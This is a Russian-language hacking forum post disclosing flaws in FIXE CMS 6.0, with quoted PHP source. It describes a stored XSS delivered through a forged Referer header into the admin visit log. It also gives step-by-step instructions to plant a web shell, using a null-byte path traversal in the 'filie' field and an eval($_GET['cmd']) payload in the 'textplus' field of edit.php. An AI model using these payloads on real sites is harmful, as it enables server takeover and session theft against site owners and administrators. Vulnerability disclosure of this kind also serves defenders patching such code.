S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
FIXE CMS
Версия: 6.0
Автор:храмеев Денис Викторович aka Includen
Сайт автора: ruxesoft.net
active xss
ядро cms.php
include($cms_root."/data/modules.dat");
modules.dat
$cms_stat_file=fopen($cms_root."/data/logs/log.log","a");
$tmp_itsbot = itsbot($_SERVER['HTTP_USER_AGENT']);
$tmp_itsbot_ = explode("|",$tmp_itsbot);
fwrite($cms_stat_file,$_SERVER['PHP_SELF']."::".$_SERVER['HTTP_REFERER']."::".$tmp_itsbot_[0]."::".$_SERVER['REMOTE_ADDR']."\r\n");
fclose($cms_stat_file);
/admin/index.php
else if ($action=="stat")
{
table_start("Лог посещений");
echo "<tr><td bgcolor=\"#E1E1E1\" align=\"center\"><b>Адрес</b></td><td bgcolor=\"#E1E1E1\" align=\"center\"><b>Откуда</b></td><td bgcolor=\"#E1E1E1\" align=\"center\"><b>Браузер</b></td><td bgcolor=\"#E1E1E1\" align=\"center\"><b>IP</b></td></tr>\n";
$stat=file("../data/logs/log.log");
foreach($stat as $element)
{
$elemen = trim($element);
$pieces = explode("::",$elemen);
echo "<tr><td>".$pieces[0]."</td><td>".$pieces[1]."</td><td>".$pieces[2]."</td><td>".$pieces[3]."</td></tr>\n";
};
echo "<tr><td align=\"center\" colspan=4><A href=\"clearstat.php\">Очистить лог посещений</a></td></tr>\n";
echo $table_end;
}
use:Подменяем referer [ HTTP_USER_AGENT - не пригоден ибо фильтруеться спасибо Паша:)] на xss вектор,идём в админку давим "Лог посещений" -> admin/index.php?action=stat лицезреем..
Заливка шелла
Особое спасибо kolpeex за помощь: )
Требования MAGIC_QUOTES_GPC=OFF : ( ибо нужен null байт и Админ права
edit.php
include("inc2.php");
function filtr($stroka)
{
return htmlspecialchars(stripslashes($stroka));
};
//Категория для новостей
if (isset($_POST['category'])){
$category = filtr($_POST['category']);
}
else
{ $category = ""; };
//Путь до list.txt
$typ = $_POST['typ'];
//Файл с полной новостью и комментариями
$filie = $_POST['filie'];
//Строка в list.txt
$line = $_POST['line'];
//Дата и время
$datetime = $_POST['datetime'];
//IP при добавлении новости
$ip = $_POST['ip'];
//Файл с полной новостью для list.txt
$qwerty = $_POST['qwerty'];
//Автор новости
$name = filtr($_POST['author']);
//Заголовок новости
$title = filtr($_POST['title']);
//Не нужная весчь
$smile = filtr($_POST['link']);
//Заменять ли перенос строк на <br>
$br = $_POST['br'];
//Заменять ли перенос строк на <br> в продолжении новости
$brplus = $_POST['brplus'];
//Собственно сам текст
$message = $_POST['text'];
//Продолжение новости
$messageplus = $_POST['textplus'];
include("../cfg.inc.php");
$message = stripslashes($message);
$message = str_replace("[1]","<img src=\"".$cms_site."/im/1.gif\" border=0>",$message);
$message = str_replace("[2]","<img src=\"".$cms_site."/im/2.gif\" border=0>",$message);
$message = str_replace("[3]","<img src=\"".$cms_site."/im/3.gif\" border=0>",$message);
$message = str_replace("[4]","<img src=\"".$cms_site."/im/4.gif\" border=0>",$message);
$message = str_replace("[5]","<img src=\"".$cms_site."/im/5.gif\" border=0>",$message);
$message = str_replace("[6]","<img src=\"".$cms_site."/im/6.gif\" border=0>",$message);
$message = str_replace("[7]","<img src=\"".$cms_site."/im/7.gif\" border=0>",$message);
$message = str_replace("[8]","<img src=\"".$cms_site."/im/8.gif\" border=0>",$message);
$message = str_replace("[9]","<img src=\"".$cms_site."/im/9.gif\" border=0>",$message);
$message = str_replace("[10]","<img src=\"".$cms_site."/im/10.gif\" border=0>",$message);
$message = str_replace("[11]","<img src=\"".$cms_site."/im/11.gif\" border=0>",$message);
$message = str_replace("[12]","<img src=\"".$cms_site."/im/12.gif\" border=0>",$message);
$message = str_replace("[13]",'<img src="'.$cms_site.'/im/13.gif" border=0>',$message);
$message = str_replace("[14]",'<img src="'.$cms_site.'/im/14.gif" border=0>',$message);
$message = str_replace("[15]",'<img src="'.$cms_site.'/im/15.gif" border=0>',$message);
$message = str_replace("[16]",'<img src="'.$cms_site.'/im/16.gif" border=0>',$message);
$message = str_replace("[17]",'<img src="'.$cms_site.'/im/17.gif" border=0>',$message);
$message = str_replace("[18]",'<img src="'.$cms_site.'/im/18.gif" border=0>',$message);
$message = str_replace("[19]",'<img src="'.$cms_site.'/im/19.gif" border=0>',$message);
$message = str_replace("=)",'<img src="'.$cms_site.'/im/2.gif" border=0>',$message);
$message = str_replace(":)",'<img src="'.$cms_site.'/im/2.gif" border=0>',$message);
$message = str_replace(":-)",'<img src="'.$cms_site.'/im/2.gif" border=0>',$message);
$message = str_replace(":p",'<img src="'.$cms_site.'/im/17.gif" border=0>',$message);
$message = str_replace(":D",'<img src="'.$cms_site.'/im/13.gif" border=0>',$message);
$message = str_replace(";)",'<img src="'.$cms_site.'/im/14.gif" border=0>',$message);
$message = str_replace(";(",'<img src="'.$cms_site.'/im/16.gif" border=0>',$message);
$message = str_replace(";-(",'<img src="'.$cms_site.'/im/16.gif" border=0>',$message);
$message = str_replace(";-)",'<img src="'.$cms_site.'/im/14.gif" border=0>',$message);
$message = str_replace(":(",'<img src="'.$cms_site.'/im/8.gif" border=0>',$message);
$message = str_replace("=(",'<img src="'.$cms_site.'/im/8.gif" border=0>',$message);
$message = str_replace(":-(",'<img src="'.$cms_site.'/im/8.gif" border=0>',$message);
if ($br == "yes") {
$message = str_replace("\r\n","<br>",$message);
}
else
{
$message = str_replace("\r\n"," ",$message);
};
$messageplus = stripslashes($messageplus);
$messageplus = str_replace("[1]","<img src=\"".$cms_site."/im/1.gif\" border=0>",$messageplus);
$messageplus = str_replace("[2]","<img src=\"".$cms_site."/im/2.gif\" border=0>",$messageplus);
$messageplus = str_replace("[3]","<img src=\"".$cms_site."/im/3.gif\" border=0>",$messageplus);
$messageplus = str_replace("[4]","<img src=\"".$cms_site."/im/4.gif\" border=0>",$messageplus);
$messageplus = str_replace("[5]","<img src=\"".$cms_site."/im/5.gif\" border=0>",$messageplus);
$messageplus = str_replace("[6]","<img src=\"".$cms_site."/im/6.gif\" border=0>",$messageplus);
$messageplus = str_replace("[7]","<img src=\"".$cms_site."/im/7.gif\" border=0>",$messageplus);
$messageplus = str_replace("[8]","<img src=\"".$cms_site."/im/8.gif\" border=0>",$messageplus);
$messageplus = str_replace("[9]","<img src=\"".$cms_site."/im/9.gif\" border=0>",$messageplus);
$messageplus = str_replace("[10]","<img src=\"".$cms_site."/im/10.gif\" border=0>",$messageplus);
$messageplus = str_replace("[11]","<img src=\"".$cms_site."/im/11.gif\" border=0>",$messageplus);
$messageplus = str_replace("[12]","<img src=\"".$cms_site."/im/12.gif\" border=0>",$messageplus);
$messageplus = str_replace("[13]",'<img src="'.$cms_site.'/im/13.gif" border=0>',$messageplus);
$messageplus = str_replace("[14]",'<img src="'.$cms_site.'/im/14.gif" border=0>',$messageplus);
$messageplus = str_replace("[15]",'<img src="'.$cms_site.'/im/15.gif" border=0>',$messageplus);
$messageplus = str_replace("[16]",'<img src="'.$cms_site.'/im/16.gif" border=0>',$messageplus);
$messageplus = str_replace("[17]",'<img src="'.$cms_site.'/im/17.gif" border=0>',$messageplus);
$messageplus = str_replace("[18]",'<img src="'.$cms_site.'/im/18.gif" border=0>',$messageplus);
$messageplus = str_replace("[19]",'<img src="'.$cms_site.'/im/19.gif" border=0>',$messageplus);
$messageplus = str_replace("=)",'<img src="'.$cms_site.'/im/2.gif" border=0>',$messageplus);
$messageplus = str_replace(":)",'<img src="'.$cms_site.'/im/2.gif" border=0>',$messageplus);
$messageplus = str_replace(":-)",'<img src="'.$cms_site.'/im/2.gif" border=0>',$messageplus);
$messageplus = str_replace(":p",'<img src="'.$cms_site.'/im/17.gif" border=0>',$messageplus);
$messageplus = str_replace(":D",'<img src="'.$cms_site.'/im/13.gif" border=0>',$messageplus);
$messageplus = str_replace(";)",'<img src="'.$cms_site.'/im/14.gif" border=0>',$messageplus);
$messageplus = str_replace(";(",'<img src="'.$cms_site.'/im/16.gif" border=0>',$messageplus);
$messageplus = str_replace(";-(",'<img src="'.$cms_site.'/im/16.gif" border=0>',$messageplus);
$messageplus = str_replace(";-)",'<img src="'.$cms_site.'/im/14.gif" border=0>',$messageplus);
$messageplus = str_replace(":(",'<img src="'.$cms_site.'/im/8.gif" border=0>',$messageplus);
$messageplus = str_replace("=(",'<img src="'.$cms_site.'/im/8.gif" border=0>',$messageplus);
$messageplus = str_replace(":-(",'<img src="'.$cms_site.'/im/8.gif" border=0>',$messageplus);
if ($brplus == "yes") {
$messageplus = str_replace("\r\n","<br>",$messageplus);
}
else
{
$messageplus = str_replace("\r\n"," ",$messageplus);
};
//Оригинальный файл
$old_file = file("../data/".$filie.".txt");
//Для редактирования
$file = fopen("../data/".$filie.".txt","w");
if ($smile == "http://")
{
$smile = "?comment=".$qwerty;
};
$i = 1;
fwrite($file,$datetime."|".$name."|".$title."|".$message."|".$smile."|".$ip."|".$messageplus."|\r\n");
for ($i=0; $i<count($old_file); $i++){
if ($i!=0){
fwrite($file, $old_file[$i]);
};
};
fclose($file);
$i = 0;
$old_file = file("../data/".$typ);
$file = fopen("../data/".$typ,"w");
//$line
for ($i=0; $i<count($old_file); $i++){
if ($i==$line){
fwrite($file,$datetime."|".$name."|".$title."|".$message."|".$smile."|".$ip."|".$qwerty."|".$category."|\r\n");
}
else
{
fwrite($file,$old_file[$i]);
};
};
fclose($file);
if ($typ == "blog/list.txt"){
header("location: index.php?action=blog#all");
}
else
{
header("location: index.php?action=news");
}; Запись в файл,но сообщение не отфильтровуеться…
Берим ff c плагином Tamper Data идём в панель редактирования новостей и выбираем произвольную новость -> включаем перехват -> жмём "Сохранить" -> В поле "filie" пишем "../shell.php%00",а в поле "textplus" пишем "<?php eval($_GET['cmd'])?>"-> отправляем и получаем промежуточный шелл в корне сайта под названием shell.php
|
FIXE CMS 6.0 - 
